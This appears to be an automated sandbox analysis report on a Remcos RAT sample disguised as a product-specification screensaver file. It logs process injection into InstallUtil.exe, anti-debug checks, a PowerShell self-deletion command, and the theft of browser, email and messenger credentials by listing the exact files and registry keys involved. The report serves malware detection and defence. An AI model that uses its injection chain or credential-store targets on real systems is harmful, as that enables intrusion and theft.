Source: C:\Users\user\Desktop\OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe TID: 8868	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe TID: 8860	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 9088	Thread sleep count: 2429 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 9088	Thread sleep time: -7287000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 9088	Thread sleep count: 7559 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 9088	Thread sleep time: -22677000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 9188	Thread sleep count: 5481 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 9188	Thread sleep count: 4277 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7160	Thread sleep time: -20291418481080494s >= -30000s	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	3_2_0040B335
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	3_2_0040B53A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_0041B63A FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,	3_2_0041B63A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_0044D7F9 FindFirstFileExA,	3_2_0044D7F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,	3_2_004089A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_00406AC2 FindFirstFileW,FindNextFileW,	3_2_00406AC2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,	3_2_00407A8C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,	3_2_00408DA7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_00418E5F FindFirstFileW,FindNextFileW,FindNextFileW,	3_2_00418E5F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	3_2_100010F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_10006580 FindFirstFileExA,	3_2_10006580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 6_2_0040B477 FindFirstFileW,FindNextFileW,	6_2_0040B477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 8_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,	8_2_00407EF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,	9_2_00407898

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Code function: 3_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,

3_2_00406F06

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Code function: 6_2_0041A8D8 memset,GetSystemInfo,

6_2_0041A8D8

Source: C:\Users\user\Desktop\OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe, 00000000.00000002.1476027682.0000000002C4E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware\|VIRTUAL\|A M I\|Xen
Source: InstallUtil.exe, 00000003.00000002.3747753610.0000000000B4A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe, 00000000.00000002.1476027682.0000000002C4E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Microsoft\|VMWare\|Virtual
Source: InstallUtil.exe, 00000003.00000002.3747543577.0000000000AD7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWXd
Source: OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe, 00000000.00000002.1475256438.0000000000EA2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllC
Source: bhv8FEB.tmp.6.dr	Binary or memory string: https://config.edge.skype.com/config/v1/Skype/1446_8.53.0.77?OSVer=10.0.19045.2006&ClientID=RHTiQUpXOaQeBtbq%2B7LgJauNdx5lF%2FQ%2FOy2qwXRNGjU%3D&Manufacturer=VMware%2C%20Inc.&Model=VMware20%2C1&Language=en&Locale=en-US

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	API call chain: ExitProcess graph end node

Source: C:\Users\user\Desktop\OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe

Process information queried: ProcessInformation

Jump to behavior

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Users\user\Desktop\OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe

Code function: 0_2_067ECA70 LdrInitializeThunk,

0_2_067ECA70

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Code function: 3_2_0043A86D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

3_2_0043A86D

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

6_2_0040BAE3

Contains functionality to dynamically determine API calls

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

3_2_0041BEEE

Contains functionality to read the PEB

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_00442764 mov eax, dword ptr fs:[00000030h]		3_2_00442764
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_10004AB4 mov eax, dword ptr fs:[00000030h]		3_2_10004AB4

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Code function: 3_2_00410BF1 GetNativeSystemInfo,GetProcessHeap,HeapAlloc,SetLastError,SetLastError,

3_2_00410BF1

Enables debug privileges

Source: C:\Users\user\Desktop\OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_00434378 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_00434378
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_0043A86D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_0043A86D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_00433D4F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_00433D4F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_00433EE2 SetUnhandledExceptionFilter,	3_2_00433EE2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_100060E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_100060E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_10002639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_10002639
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_10002B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_10002B1C

Source: C:\Users\user\Desktop\OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Contains functionality to inject code into remote processes

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Code function: 3_2_0041742B GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError,

3_2_0041742B

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A

Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe protection: execute and read and write	Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 458000	Jump to behavior
Source: C:\Users\user\Desktop\OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 471000	Jump to behavior
Source: C:\Users\user\Desktop\OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 477000	Jump to behavior
Source: C:\Users\user\Desktop\OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 47C000	Jump to behavior
Source: C:\Users\user\Desktop\OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 62A008	Jump to behavior

Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe

3_2_0041100E

Contains functionality to simulate mouse events

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Code function: 3_2_0041894A mouse_event,

3_2_0041894A

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"	Jump to behavior
Source: C:\Users\user\Desktop\OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" Start-Sleep -Seconds 5; Remove-Item -Path 'C:\Users\user\Desktop\OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe' -Force	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /stext "C:\Users\user\AppData\Local\Temp\wwygbptuchcdfblksmaltqitnujxaycgq"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /stext "C:\Users\user\AppData\Local\Temp\yyezc"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /stext "C:\Users\user\AppData\Local\Temp\yyezc"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /stext "C:\Users\user\AppData\Local\Temp\isrjdappm"	Jump to behavior

Source: InstallUtil.exe, 00000003.00000002.3747753610.0000000000B22000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: InstallUtil.exe, 00000003.00000002.3747543577.0000000000AD7000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.3747753610.0000000000B22000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \|Program Manager\|
Source: InstallUtil.exe, 00000003.00000002.3747753610.0000000000B22000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerY

Contains functionality to query CPU information (cpuid)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Code function: 3_2_00434015 cpuid

3_2_00434015

Contains functionality to query locales information (e.g. system language)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: GetLocaleInfoA,	3_2_0040E751
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	3_2_0045107A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: GetLocaleInfoW,	3_2_004512CA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: EnumSystemLocalesW,	3_2_004472BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	3_2_004513F3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: GetLocaleInfoW,	3_2_004514FA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	3_2_004515C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: GetLocaleInfoW,	3_2_004477A7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	3_2_00450C8F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: EnumSystemLocalesW,	3_2_00450F52
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: EnumSystemLocalesW,	3_2_00450F07
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: EnumSystemLocalesW,	3_2_00450FED

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe	Queries volume information: C:\Users\user\Desktop\OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Code function: 3_2_00404915 GetLocalTime,CreateEventA,CreateThread,

3_2_00404915

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Code function: 3_2_0041A9AD GetComputerNameExW,GetUserNameW,

3_2_0041A9AD

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Code function: 3_2_0044804A _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,

3_2_0044804A

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Code function: 6_2_004192F2 GetVersionExW,

6_2_004192F2

Source: C:\Users\user\Desktop\OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Remcos RAT

Source: Yara match	File source: 3.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe.3c73988.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe.3c73988.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.3747543577.0000000000AD7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1493124688.0000000003C31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1493124688.0000000003D30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3746761477.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe PID: 8840, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 9048, type: MEMORYSTR

Contains functionality to steal Chrome passwords or cookies

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data

3_2_0040B21B

Contains functionality to steal Firefox passwords or cookies

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\		3_2_0040B335
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: \key3.db		3_2_0040B335

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior

Tries to steal Instant Messenger accounts or passwords

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Key opened: HKEY_CURRENT_USER\Software\Paltalk	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail	Jump to behavior

Tries to steal Mail credentials (via file registry)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: ESMTPPassword	8_2_004033F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword	8_2_00402DB3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword	8_2_00402DB3

Yara detected WebBrowserPassView password recovery tool

Source: Yara match	File source: 6.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE
